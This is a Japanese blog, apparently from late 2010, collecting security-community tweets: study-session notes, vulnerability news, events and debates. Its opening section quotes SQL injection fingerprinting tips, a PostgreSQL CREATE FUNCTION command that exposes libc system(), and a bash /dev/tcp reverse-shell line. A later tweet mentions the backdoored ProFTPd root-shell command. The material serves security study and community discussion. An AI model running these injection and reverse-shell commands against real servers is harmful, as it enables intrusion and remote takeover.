matsuu: #matcha445 O/Rマッピングでできないことはprepareをつかいましょうね。大切なお願いです

matsuu: #matcha445 例 SELECT * FROM testtbl WHERE myName='coffee'; coffeeをcoffee'としてエラーになったらヤバい。coffee''でエラーが出なかったらヤバい確定。

matsuu: #matcha445 方言の違いを応用してインジェクションでDBの推測ができる。文字列結合演算子で判定するなら||, &, +など

matsuu: #matcha445 MySQLはシングルクォートだけでなくダブルクォートでも囲める変態なので"でインジェクションできる場合もある。

matsuu: #matcha445 MySQLはバージョンごとのコメント機能があるのでコメント機能を使ってバージョンまで調べることができる。

matsuu: #matcha445 MySQLのENCRYPT()関数はUNIXだと正しく動くが、WindowsだとNULLが返ってくる。これを使ってOSを推定することができる。まぁMySQLってなんて便利なんでしょう

kakoi_ferment: MySQLはコメントを使用してバージョンごとに動作を指定可能。 SQL文にコメントを仕込めばバージョンの特定まで可能。 #matcha445

matsuu: #matcha445 PostgreSQL判定法。current_dateやnow関数を使えば可能

matsuu: #matcha445 数字を入力するパターン。数式を入力することでインジェクションができるか判断できる


matsuu: #matcha445 UNIONで攻撃しようとしても、フィールド数を合わせないといけないし事前カウントしてる場合があるので攻撃する際には使いにくいですよ。

matsuu: #matcha445 PostgreSQL7でSQLインジェクションがあってpostgresユーザを使ってる場合、CREATE FUNCTIONでコマンドインジェクションが可能。

matsuu: #matcha445 CREATE FUNCTION systemExec(name) RETURNS integer AS '/lib/libc.so.6','system' LANGUAGE C STRICT; ってのをインジェクションすればok

matsuu: #matcha445 んでSELECT systemExec('bash -i >& /dev/tcp/192.168.xx.xx/80 0>&1');とかやるとアウトー

matsuu: #matcha445 PostgreSQLはマイナー。使ってるお客様が少ない。PostgreSQLのポートをグローバルに晒してても全然アタックされなかったらしい。PostgreSQLェ

sagami22: PostgresSQLはポート開けてもスキャンすら来ない #matcha445



ITSec_JPってのがあるんですね。見た限りなんかボットっぽいですが。
matsuu: #matcha445 ITセキュリティに関する情報であればどんどん #ITSec_JP に流してくださいね。 @ITSec_JP もよろしく!



php5.3.4がリリースされた模様です。5.2台のサポートはもう終わるっぽいですがどうなるのでしょう。
yohgaki: php 5.3.4でsetsymbolの脆弱性が修正されたけど、もうgetsymbolの脆弱性が追加された。

yohgaki: あれ、よく見たらgetsymbolの件がリリースノートに書いてないですね。スタックオーバーフローだったような気がするけど。

yohgaki: http://ow.ly/3mSjL というバグが5.2.15には入っているのでご注意ください。いきなりエラーとなってしまうアプリもあるはずです。



その他気になったことはこのあたり。
netagent_jp: ブログに「IE8+jQueryによるクロスドメイン通信とXDomainRequestラッパーの作成」を公開しました。JS Advent Calendar 参加記事です。 http://www.netagent-blog.jp/archives/51509761.html


miryu: 同感だな。ログイン成功したらデータ全部奪って終わり。 > 「自分がそこにいると警告することなく長い時間をかけて盗聴するような受動的な攻撃者を想定している。しかし、今日では多くの場合その想定は通用しない。 / When to Change… http://htn.to/kEbLUY


07c00: 来週土曜日に、0と1しか興味ない人のためのマルウェア分析会(http://www.netagent-blog.jp/archives/51505943.html)があります。興味ある方はぜひご参加ください。#01binarians


テーマ : セキュリティ
ジャンル : コンピュータ

12月9日のtwitterセキュリティクラスタ

昨日はセキュリティ絡みの話題がテレビでいろいろ取り上げられていたようです。ぼくもたまたまニュース9は見ましたよ。
cchanabo: NHKのニュース9でデジタルフォレンジックが取り上げられてたので、とりあえず録画した。学生の教材に使えるかな。。。

hasegawayosuke: 報道ステーションに公安の情報漏洩の話。 @lumin さんが出てる。

prof_morii: [2010/12/08]特命調査班 ~マル調~「ゲームソフト違法業者を直撃!」 http://www.mbs.jp/voice/special/201012/08_30885.shtml 協力したTV番組はこれでした。



どうやらセキュリティキャンプ方面が大変そうな雲行きですね。
kuroneko_stacy: IPA離婚しそうなう。

tessy_jp: えー #spcamp RT @_bun_ RT @kuroneko_stacy IPA離婚しそうなう。

tessy_jp: 夫婦の相談事を秋葉で聞くなど

sonodam: IPAの対応が大問題なので、ちょっと18日の実施報告会は行きませんので。ごめんねー>各方面

sen_u: 右に同じく。 RT @sonodam: IPAの対応が大問題なので、ちょっと18日の実施報告会は行きませんので。ごめんねー>各方面 #spcamp



パスワードの定期変更についてTLもちょっと盛り上がっていました。定期変更はローテーションさせるタイプなのでやりたくありませんよ。
tamiyata: ウチの関係者も徳丸さんのこの記事読めばいいのに!という夢を見た/続パスワードの定期変更は神話なのか - ockeghem(徳丸浩)の日記 - http://bit.ly/gsdfSH

hasegawayosuke: そういえば、顔文字をパスワードにすると「認術修行」で高得点だ、という話が昔あったね。

tomoki0sanaki: 自分で考えてください。そして、第一人者になってください! QT @repeatedly 結局パスワードの保存に関してはどうすれば一番安全なのん?

ockeghem: これは良いエントリ。もっと早く知っていれば、昨日の僕のエントリは書かなくて済んだのにw / パスワード定期変更云々 - pochi-pの日記 http://htn.to/Jz5Jrb

Akira_Murakami: パスワード論争。クラックされる確率もさることながら、ブルートフォース受ける確率って加味しなくてもよいのだろうか?攻撃うけてたら、その前にに気がつくだろってのもあるな。思考停止でイイじゃんって意見もあるが、ちょっと違和感。

tomoki0sanaki: 適切な強度のパスワードに対して、オンラインでは現実感がないです。現時点ではBFはオフラインに限定されるでしょう。つまり、ハッシュ解析の一つとしてBFは考えられます。 QT @Akira_Murakami ブルートフォース受ける確率って加味しなくてもよいのだろうか?



あと気になったところはこのあたり。

jpcert_ac: Twitter ワームの件、短縮 URL の先にアクセスしていくと、既知の IE と JDK(JRE)と PDF の脆弱性経由でマルウェアをインストールされますね。アップデートしている人は大丈夫そうですが、アクセスしちゃダメですよ。^YN


MasafumiNegishi: セキュリティ女子座談会おもしろいね。セキュリティキーワード2010 | LAC: http://me.lt/21ps


dynamitter: #WebSockets大好きなみなさん、rev76には重大なセキュリティ問題がある http://bit.ly/dZey7I ため#Firefox4ではwebsocketsデフォルト無効になりますのでよろしく http://bit.ly/fBMAqC


packet_storm: GnackTrack RC2 Has Just Been Released http://packetstormsecurity.org/news/18280 #news


ockeghem: ディレクトリ・トラバーサルに比べると、メールヘッダインジェクションはモチベーションが高まるのを感じる…そうだディレクトリ・トラバーサルで、あれを説明するのを忘れてた…追加しよ

ockeghem: メールヘッダ・インジェクション攻撃のデモを書いている。役割が4人は必要。ユーザ1、ユーザ2、管理者。早速、alice、bob、carol、eveの出番だw …っと、eveはアカウント作らなくてもいいかな?

テーマ : セキュリティ
ジャンル : コンピュータ

12月8日のtwitterセキュリティクラスタ

librahackの人もようやく疑いが晴れそうでよかったです。とりあえずわかりもせず疑った奴らは謝って頂きたいものです。
ockeghem: 応援ブクマ / asahi.com:岡崎図書館問題 起訴猶予の男性、謝罪要求-マイタウン愛知 http://htn.to/rjn92n

tdaitoku: RT 岡崎市立図書館問題でlibrahack氏「前例となって技術者が逮捕されることを心配」 http://www.itmedia.co.jp/news/articles/1012/08/news116.html



ハッカージャパン新年号発売されました。みんな1日1冊ずつ買えば原稿料も上がるかもしれません。
hasegawayosuke: ハッカージャパン 2011年1月号、今をときめく @ucq さんによるイベントレポート記事も載ってます! #ucq

ucq: ハッシュタグw RT @hasegawayosuke: ハッカージャパン 2011年1月号、今をときめく @ucq さんによるイベントレポート記事も載ってます! #ucq

tomoki0sanaki: 今号から、私もHJ の執筆陣の仲間入りです♪



たかが芸能人1人が酔って喧嘩したことを、どうしてあんなに大きく取り上げるのでしょうね。
kjmkjm: @kjmkjm 「極秘データ大丈夫?情報流出を食い止める“デジタル鑑識”とは」、市川海老蔵のおかげで吹き飛んでしまいましたね…。



隠しページを見つけるという古典的なやり方ですが、ブルートフォースはできないようになってるんでしょうね。
lumin: 自然言語もしくはデータマイニングとperlもしくはpythonなどができる人を募集し始めました。自然言語処理をやっている人ならすぐに回答できる問題付きです。こんなところに問題が出せるなんて初めて知りました。 http://bit.ly/fDmPF7



その他気になったことはこのあたり。

expl01t: 予算も人数も桁違いって聞いたことあります。 “@KuniSuzaki: Cyber Security Research and Development Center ホームページ。日本だとNISCが該当する? http://www.cyber.st.dhs.gov/


totoromasaki: うわぁ・・・・。グーグルストリートビュー、新しくなったから確認したら、また妙なところ撮影してるよ・・・。 *YF*


jnsa: こんばんは 「Network Security Forum 2011」 申し込み受付開始しました。 http://www.jnsa.org/seminar/nsf/2011/


yarai1978: グラフビューが遂に無償で利用できる! IDA Pro 5.0 Freeware http://www.hex-rays.com/idapro/idadownfreeware.htm


yuri_at_earth: 来年のAVTOKYOのための?「AVホール」ちょっと狭そうだけど http://www.kcf.or.jp/morishita/facilities.html#14


hasegawayosuke: 記号トラック、ここまで言語の重複なし。どんな言語でも記号だ! RT @takesako: サルでもわかるPython顔文字プログラミング - 2010 advent calendar sym #jpac2010 書きました http://bit.ly/hBs3Bo #pw1012


katt87: Twitterユーザーをターゲットにしたウイルス出現--URL短縮サービスのgoo.glを利用: Twitterユーザーをターゲットにした、「goo.gl」サービスによって短縮されたURLを利用する新しいウイルスが出現している。 http://bit.ly/hKwKzD


risa_ozaki: Windowsショートカットファイル処理の脆弱性を狙うマルウェアが1位 http://j.mp/gjvU81

テーマ : セキュリティ
ジャンル : コンピュータ

12月6~7日のtwitterセキュリティクラスタ


セキュリティの記事がフルボッコにされています。こういうこと書かれると心が折れそうですが、この内容を掲載できると言うことは、自分を信じているか心の強い人なんでしょうね。
haruyama: いろいろだめな記事 http://bit.ly/hzMcsm 会社を強くする経営者のためのセキュリティ講座:第6回 経営者が注意すべき「パスワードクラッキング」 (1/3) - ITmedia エンタープライズ

ockeghem: またもや珍妙な理由づけでパスワードの定期変更を必須とする「セキュリティ専門家」がいるようだが、反論する気力も出ない

ockeghem: ハッカーとクラッカーの違いのうんちくを枕に振っておきながら、ローカルクラックとリモートクラックの区別がつかない「セキュリティ専門家」って

ntsuji: @ockeghem その記事ボクも読みました。以前からアレな空気が漂っていたんですよね。具体的なことがなくて単純に恐怖をあおっている節もあってあまり好きではないタイプの記事でした。

ockeghem: @ntsuji 今時これはないわ~、という記事ですね。昔の名前で出ていますって奴?

ntsuji: @ockeghem この方、あまり存じ上げないのですが、ちょっとクラシックな感じがしました。一度、対談とかしてみたいですねw

tessy_jp: 記事見てないけど、どこを指しているなんとなく想像できてググったらヒットしたところ。 RT @ntsuji: @ockeghem この方、あまり存じ上げないのですが、ちょっとクラシックな感じがしました。一度、対談とかしてみたいですねw

ntsuji: @tessy_jp つぶやき内容から想像できちゃってリプライしたら普通に話が通じる、そして、それを見てた方が検索して見つける。もはや、CTFのトリビア級ですねw

ockeghem: @ntsuji なんだかすごく有名な方のように書いてあるのに、僕は知らない人なので、きっと僕が新参者で勉強不足だから存じ上げないのだろうと思い込んでいましたw ぜひ対談してくださいw

ntsuji: @ockeghem あら徳丸さんもご存じなかったんですか。お互い精進しましょうw この分だと対談への道のりは長く険しそうですw

cchanabo: 出展がWikipediaってありなのか…(; ̄ェ ̄) RT @Akira_Murakami: (cont) http://tl.gd/7bs3e3



そもそもjpドメインが安全って意味がわかんないですが… jpドメインを使用したサイトが安全なのか、それともjpドメインのDNSが強固なのか… どこかの経営者が「うちはjpドメインにしたのに攻撃された!CMに騙された!」とかJPRSに訴訟でも起こすのではないかと思いますが。
hasegawayosuke: 「.jpドメインは世界で最も安全」という資料から、日本は情報セキュリティ対策が十分進んでいる→これ以上の人材育成は不要では? って発想はすごいな。

vulcain: 机上&幻想の世界の話かぁ、、、 RT @yumano orz どこの世界だそれは・・・ RT @hasegawayosuke: 「.jpドメインは世界で最も安全」という資料から、日本は情報セキュリティ対策が十分進んでいる→これ以上の人材育成は不要では? って発想はすごいな。

hasegawayosuke: 「.jpドメインではない、jumperz.net みたいな危険なサイトがあるので、まだまだ人材育成が必要です。」



使い途は特にないのですが、IS01手に入れておけばよかったかなあと思ったり思わなかったり。
connect24h: IS01でアドホック接続を有効にしてiPhoneと繋げる手順をまとめてみた: A piece of code! http://ow.ly/3ki2h

ymzkei5: ■au『IS01』のroot権限を奪取する(ビルド番号01.00.09版) - ガジェット通信 http://getnews.jp/archives/87469

arduinoblog: USB Hacking with Arduino http://bit.ly/eC1HMB



とか言って興味あるから入れてくれと言っても簡単に入れてはもらえないのですけどね。たぶん。
MasafumiNegishi: RT 日本企業のセキュリティ対策、最大の課題は人的リソース不足――NRIセキュア調査 - http://j.mp/eBcBCm


あと気になったことはこのあたり。

ymzkei5: モバゲータウン。>■強制退会にキレた中3 モバゲーに脅迫メール http://www.sponichi.co.jp/society/flash/KFullFlash20101206037.html


hasegawayosuke: とかに任意の属性を注入出来るときにユーザインタラクティブなしにXSSしたい (あるいは対象が hidden だ) というのは、XSSのFAQだなー。


yumano: セキュリティ会社怖い! RT @keijitakeda: やっぱりセキュリティ会社って怖いところなんですね! http://bit.ly/fOOl0Q 建前は「セキュリティー会社」 海老蔵暴行事件を起こした"六本木闇組織"の素顔


ScanNetSecurity: 新着セキュリティNEWS : 海外における個人情報流出事件とその対応「消費者側の理解も求められるSNSアプリの情報管理(1)Facebookの人気アプリがIDを送信」 http://scan.netsecurity.ne.jp/archives/51918698.html


trendmicro_jp: [セキュリティブログ]11月のランキングで急浮上した多機能不正プログラム「プロラコ」を解説 http://blog.trendmicro.co.jp/archives/3787


eagle0wl: そろそろ所持が違法になりそうなマジコンも、凄まじいまでのパクリ合戦で、パクリのパクリのパクリのパクリが平然と存在するキングオブカオス状態。例えば最も有名なマジコンR4は現在様々なバリエーションが存在するが、全部偽物である(本家はすでに手を引いている)。サイトの作りもパクリ。


テーマ : セキュリティ
ジャンル : コンピュータ

12月3~5日のtwitterセキュリティクラスタ

この週末はクラウドにアプリをたくさんインストールするイベントにかかりっきりでした。で、データベースが壊れて大変なことになりました。クラウドって怖い><


ということで今日は気になったことを列挙するのみです。

tomoki0sanaki: そもそもエニグマ解読は、ドラマになっているが、日本軍の暗号解読がドラマにならないのは、・・・・解読が(エニグマに比べて)簡単だったから!?


suzukimasatomo: プロバイダ12社中10社は令状なく接続記録や契約者情報を警察に提供か。「文書流出、警視庁が接続記録差し押さえ」(2010年12月4日 読売新聞) http://www.yomiuri.co.jp/national/news/20101203-OYT1T00963.htm


kaito834: ProFTPd 1.3.3c の改ざんされたソースコードをビルドしてみた。ビルドされた ProFTPd に HELP ACIDBITCHEZ コマンドを入力すると、root 権限でシェルが起動した。赤枠がユーザの入力となる。http://is.gd/i9hoB


tetsutalow: MDISは、岡崎の情報の流出先図書館の一覧は、各図書館が公表しないで欲しいといってるのでできないと。冗談だろと思ってたらどうやらいくつかの自治体に関しては本当にそうらしい。自治体側の落ち度でもないのになんでそんなことになるのか。IT ストックホルム症候群怖い。 #librahack


gohsuket: EveryDNSのおかげで一気にミラー増加 RT @JPBarlow: Current list of WikiLeaks mirrors http://wikileaks.info/ We need more. Where is Iceland? #SaveWikiLeaks


bakera: ソフトウェア製品の脆弱性発見か、と思ったら最新版では再現しない……という時の安堵感とがっかり感の入り混じった微妙な感覚がなんとも。


umq: ステージングなしに本運用突入? ``機能追加・修正を行いましたが、プログラムの不具合で、ホスト名がない場合の「Aレコード」が上書きされてしまう症状が発生'' < http://mainte.value-domain.com/eventview.cgi?host=All&no=4


kenji_s: 『WordPress 3.0.2』がリリース、多くの脆弱性に対処 http://ow.ly/3jcf6


ockeghem: 興味深い / MIMEデリミタ注入攻撃 http://htn.to/P2Rexz


risa_ozaki: マルウェア対策とクラウド技術のコラボレーションとは??KasperskyのCTO http://j.mp/i0xPSL


risa_ozaki: McAfeeの企業向けウイルス対策製品に脆弱性 http://j.mp/gBdLhW

テーマ : セキュリティ
ジャンル : コンピュータ

12月2日のtwitterセキュリティクラスタ

年末が近づいてきたからなのかたまたまなのか告知が多いような気がします。忘年会とかも重なりそうですよね。


テレビやラジオで話題のucq氏に続いて今度はa4lg氏が「Hacker' Dream」という韓国のイベントで優勝されたようです。おめでとうございます。日本人すごいですね。
vangelis_at_POC: [POC2010 News] Result of "Hacker' Dream" is out. Tsukasa Ooi is the champion of this year. Check: http://powerofcommunity.net/event.html

tessy_jp: すげー @a4lg さん優勝! >>[POC2010 News] Result of "Hacker' Dream" is out. Tsukasa Ooi is the champion of this year. Check: http://bit.ly/cfwedh

a4lg: Mobile の得点が低いのは、やはりサボって書いたのが響いたか。それ以外のすべてでほぼ最高得点をマークできたことは良かった。

a4lg: 一応 Hackers' Dream 優勝までの経緯をブログにまとめた。 http://j.mp/i3kiLj



おめでとうございます。記号プログラミングは仕事じゃないらしいです。
hasegawayosuke: みなさんありがとうございます。いちにのさん、で定年になりました。あとは仕事せず適当に暮らします。

hasegawayosuke: 「PHPでも記号プログラミング! - JPerl advent calendar 2010 sym Track」 http://perl-users.jp/articles/advent-calendar/2010/sym/2 @hnw++


Tシャツ気になりますが、もらえるわけではなく、オプーナのように買う権利が与えられるだけですね。
yarai1978: 『アナライジング・マルウェア』出版記念イベント。マルTはここでしか入手できません(笑)のこり40席ほどです。忘年会の季節で恐縮ですが、この機会にぜひ。 http://atnd.org/events/10310



行きたいんだけどなあ。その前も後も土曜日いないし心苦しい…
ripjyr: 第21回まっちゃ139勉強会は2010年12月18日(土曜日)に開催!内容は、Mixiの中のシステムの話が聞けます!是非!#matcha139 http://bit.ly/21th-matcha139



実は僕も原稿書いたことがあるんですよ。
sen_u: 実はScanNetSecurityは昨日から新しいシステムに移行しています。今後ともよろしくお願いします。 http://scan.netsecurity.ne.jp/



その他気になったことは以下の通り。
_kana: [告知] ブラックハットジャパンその後 九州編 (IAJapan) 12.18土 500円 http://dlvr.it/9YnWX。アップしてないけど少し聞いた九州のメンバの講演内容も面白そう♪その後のその後もおいしい時間+いろんな交流が楽しみ♪


mincemaker: 前回のYahoo繋がらないネタで dig domain any +trace というのを学んだので覚えていてよかった。


JVN: ISC BIND named validator に脆弱性 http://jvn.jp/cert/JVNVU837744/

テーマ : セキュリティ
ジャンル : コンピュータ

12月1日のtwitterセキュリティクラスタ

時間の都合で今日のコメントはない方向で。mixiは面白いことになっていますが、僕のアドレス帳からネカマは見つからなかったことをご報告させて頂きます。

sen_u: mixiのメールアドレスで友達を探す機能は何で作っちゃったんだろ。デフォルトで公開だから気をつけて?。ここで公開しない設定できます→ http://mixi.jp/edit_account_search_privacy.pl

sonodam: ミクシの中の人が高松に来たときに聞けば良かったけど、もしかしてミクシって、利用者のリテラシーなるものに過度に期待していることがあったりすんのかな?あるいは、単にビジネス上の要件で動いているだけなのかも知れないけど。


tdaitoku: F社はテスト要件を満たさないのですか? QT 徹底検証!最新ウイルス対策ソフト、7社のパフォーマンス比較 http://bit.ly/hhXSS5


uta46: どれも「ハッカー」よりずっとマシですよっ!RT @shudo: 単語「ウィキ」(のみんなの印象)が黒くなる。Wikileaks の影響で。ファイル共有ソフトで、単語「P2P」が真っ黒になったのとおなじく。


k_morihisa: IPv4アドレスのIANA在庫、あと/8を2ブロック残すのみ(社団法人日本ネットワークインフォメーションセンタ) http://www.nic.ad.jp/ja/topics/2010/20101201-02.html


_hito_: ログを解析しますとか言われて素直に渡したらgrepしてるだけかよみたいな事例も発生。コンテキストに基づいて読めば明らかに致命的だってわかるだろーがみたいな。


hasegawayosuke: 記号プログラミング Advent Calendar もはじまったよ! http://bit.ly/eyq0IZ 記事公開の方法も書いたので参加よろしくー。 http://bit.ly/gRXlX8


miryu: まっちゃ445 目覚ましLTはiisec原田研究室のクラウドセキュリティの話をしようかな。10分で。


Iori_o: eplusが403を返してくる。さすがLUNACYだ。

テーマ : セキュリティ
ジャンル : コンピュータ

11月30日のtwitterセキュリティクラスタ

困ったことにもう12月ですよ。


ようやくMDISが詫びたようで。
ymzkei5: ■弊社図書館システムに生じた問題について(お詫び) | MDIS http://www.mdis.co.jp/news/press/2010/1130.html

tetsutalow: 細かいツッコミ所はこれからバンバン突っ込めばいいんじゃないでしょうかね。特に技術的なところはその会社の技術力晒すだけなんで、ここは元々期待してません。それより、SIerさんの最大の仕事は運用なんだからそれダメでしたってのは割と思い切ったなと思いましたよ。 #librahack



もう埋まっているのかもしれませんがまっちゃ139の告知がありました。
ripjyr: 第21回まっちゃ139勉強会は2010年12月18日(土曜日)に開催!内容は、Mixiの中のシステムの話が聞けます!是非!#matcha139 http://bit.ly/21th-matcha139



そして、年明けにイベントがあるかも!?
hasegawayosuke: 年明けに「セキュリティキャンプキャラバン in 関西 by まっちゃ139」とかやりたいな。

ripjyr: いいねぇ、やろうやろう! QT @hasegawayosuke: 年明けに「セキュリティキャンプキャラバン in 関西 by まっちゃ139」とかやりたいな。



まさにデジタルネイティブの集まりですね。
yasulib: ネットエージェント オフィシャルブログ - 「0と1しか興味ない人のためのマルウェア分析会 開催のお知らせ」 すごくレベル高そう... http://www.netagent-blog.jp/archives/51505943.html



朝日新聞にも掲載されたucq氏が今度はTBSでも取り上げられたそうです。大人気ですね。
a4lg: ucq が晒しあげされてたwwwwwwww

a4lg: 新聞の次は TV ですかw

a4lg: うん、TBS 系列 「ひるおび!」 今日の 11:25 くらい。Wikileaks に関する話題の次に出てた。

a4lg: Wikileaks の話題 → Wikileaks 創設者アサンジュ氏は元ハッカー → ハッカーって悪いヤツ? → そうでもない → @ucq 晒しあげ → 下村努さん という流れでした。



新時代はもうそこまできているのですね。
Murashima: 初めて IPv6 の spam が来た



あと気になったことはこのあたり。

HiromitsuTakagi: 今日の朝日新聞朝刊オピニオン面「記者有論」、神田大介記者の「図書館とIT 向き合わねば存亡の危機に」が掲載されてる。 #librahack


ntsuji: iPhoneユーザの方に協力してもらい「iPhoneのSafariにURL表示問題、詐欺サイトで悪用の恐れ」( http://bit.ly/gKecYQ ) のデモを見ました。動くのできちんと見てれば分かると思いますが、「なんか変な動きしたな」程度で騙されるかもしれないですねー


swim_taiyaki: WikiLeaksにアメリカの公電が流出したことで、「アメリカ政府でも防げないんだから」ということで情報漏えいの対策をしないというのは理由になりません!と電車の中で言いたかった今朝。http://j.mp/fe66yo


gohsuket: hmmm RT @SocialMediaSec: RT @lbhuston: Twitter Password Decryptor http://bit.ly/eSPefA


MasafumiNegishi: 10Gbpsか、今回はでかいね。 RT @wikileaks: DDOS attack now exceeding 10 Gigabits a second.

テーマ : セキュリティ
ジャンル : コンピュータ

プロフィール

bogus

Author:bogus
FC2ブログへようこそ!

最新記事
最新コメント
最新トラックバック
月別アーカイブ
カテゴリ
検索フォーム
RSSリンクの表示
リンク
ブロとも申請フォーム

この人とブロともになる

QRコード
QR
カレンダー
12-2010
SUN MON TUE WED THU FRI SAT
- - - 1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31 -

11   01

上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。